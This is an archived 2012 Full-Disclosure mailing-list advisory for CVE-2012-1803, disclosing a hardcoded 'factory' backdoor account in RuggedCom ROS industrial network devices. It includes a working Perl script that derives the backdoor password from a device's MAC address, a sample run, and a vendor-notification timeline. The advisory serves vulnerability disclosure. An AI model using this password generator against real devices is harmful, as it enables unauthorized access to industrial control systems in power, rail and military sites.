lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CACZckjDeqjNjeLg=8p8CL8qgGCb2eG5XhNuJpFckc9AM3SDUfA@mail.gmail.com>
Date: Mon, 23 Apr 2012 13:25:30 -0700
From: jc <jc@...rew.org>
To: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com
Subject: RuggedCom - Backdoor Accounts in my SCADA
	network? You don't say...

Title:         Undocumented Backdoor Access to RuggedCom Devices
Author:        jc
Organization:  JC CREW
Date:          April 23, 2012
CVE:           CVE-2012-1803

Background:
RuggedCom is one of a handful of networking vendors who capitalize on
the market for "Industrial Strength" and "Hardened" networking
equipment.  You'll find their gear installed in traffic control
systems, railroad communications systems, power plants, electrical
substations, and even US military sites.  Beyond simple L2 and L3
networking these devices are also used for serial-to-ip converstion in
SCADA systems and they even support modbus and dnp3.  RuggedCom
published a handy guide to some of their larger customers at
www.ruggedcom.com/about/customers/.  My favorite quote is from a
contractor who installed RuggedCom equipment at a US Air Force base:
"Reliability was not an option."  How unfortunately apropos.

Problem:
An undocumented backdoor account exists within all released versions
of RuggedCom's Rugged Operating System (ROSĀ®).  The username for the
account, which cannot be disabled, is "factory" and its password is
dynamically generated based on the device's MAC address.  Multiple
attempts have been made in the past 12 months to have this backdoor
removed and customers notified.

Exploit:
#!/usr/bin/perl
if (! defined $ARGV[0]) {
print "+========================================== \n";
print "+ RuggedCom ROS Backdoor Password Generator \n";
print "+ JC CREW April 23 2012 \n";
print "+ Usage:\n$0 macaddress \n";
print "+========================================== \n";
exit; }
$a = $ARGV[0];
$a =~  s/[^A-F0-9]+//simg;
@b = reverse split /(\S{2})/,$a;
$c = join "", @b;
$c .= "0000";
$d = hex($c) % 999999929;
print "$d\n";

Example usage:
Given a RuggedCom device with MAC address 00-0A-DC-00-00-00, run some
perl and learn that the password for "factory" is 60644375.

[jc@....aids ros]$ ./ruggedfail.pl 00-0A-DC-00-00-00
60644375
[jc@....aids ros]$

Shoutouts:
CERT/CC for doing great work in trying to get vendors to actually fix things.
JC CREW

Timeline:
Apr 2011      - Vendor notified directly
Jul 2011       - Vendor verbally acknowledges knowledge of backdoor,
and ceases communication.
Feb 11 2012 - US-CERT notified
Mar 12 2012 - Vendor responds to US-CERT.
Apr 06 2012 - Due to lack of further contact by vendor, CERT sets
public disclosure for April 13 2012
Apr 10 2012 - Vendor states they need another three weeks to alert
their customers, but not fix the vulnerability.
Apr 11 2012 - Clarification requested regarding need for additional three weeks.
Apr 23 2012 - No response from vendor.
Apr 23 2012 - This disclosure.

Keywords:
RuggedCom
ROS
RuggedSwitch
RuggedServer
backdoor

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ